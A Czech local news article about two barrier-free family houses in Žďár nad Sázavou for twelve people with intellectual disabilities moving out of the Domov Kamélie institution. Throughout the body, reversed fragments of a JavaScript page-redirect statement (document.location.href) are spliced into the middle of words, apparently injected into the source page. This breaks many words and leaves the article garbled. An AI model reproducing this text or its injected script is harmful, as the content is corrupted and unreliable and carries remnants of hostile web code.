Rainbow page separator

Klienti křižanovského ústavu najdou nové bydlení i ve Žďáře

Sobota, 7. září 2019

Žďár nad Sázavou / Dva bezbariérové rodinné domky určené pro klienty křižanovského Domova Kamélie vyros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou ve žďárské ulici U Křížku v lokalitě Klafar. Výstavba je naplánována v rámci již započatého procesu transformace Domova Kamélie, příspěvkové organizace Kraje Vysočina.
V domcích bude žít celkem dvanáct lidí s mentálním a kombinovaným postižením, jejichž stav však nevyžaduje, aby trávili život v ústavu. V minulých letech už podobné domky ve formě malých domácností a pod dohledem odborného personálu v rámci transformace sociálních služeb vznikly v řadě měst a obcí žďárského okresu. „Jde o změnu organizace z ústavního typu na komunitní typ poby[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových sociálních služeb, které budou posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továny o menší kapacitě v běžné zástavbě měst a obcí po celém kraji,“ potvrdil náměstek hejtmana Kraje Vysočina pro oblast sociálních věcí Pavel Franěk.
„Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to prodejem pozemků pro ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to domy vychází vstříc další potřebné sociální službě, po které rodiny s osobou se zdravotním postižením dlouho volaly. Do nových domů se v první řadě nastěhují klienti Domova Kamélie, kteří ze Žďáru nad Sázavou pocházejí, nebo tam mají vazby na svoji původní rodinu. V případě uvolnění kapacity bude služba především pro občany Žďáru a okolí, kteří spadají do té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to cílové skupiny,“ doplnil žďárský mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostarosta Josef Klement.
Domky by měly být ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovy na konci příštího roku, se zahájením provozu je počítáno v prvním pololetí roku 2021.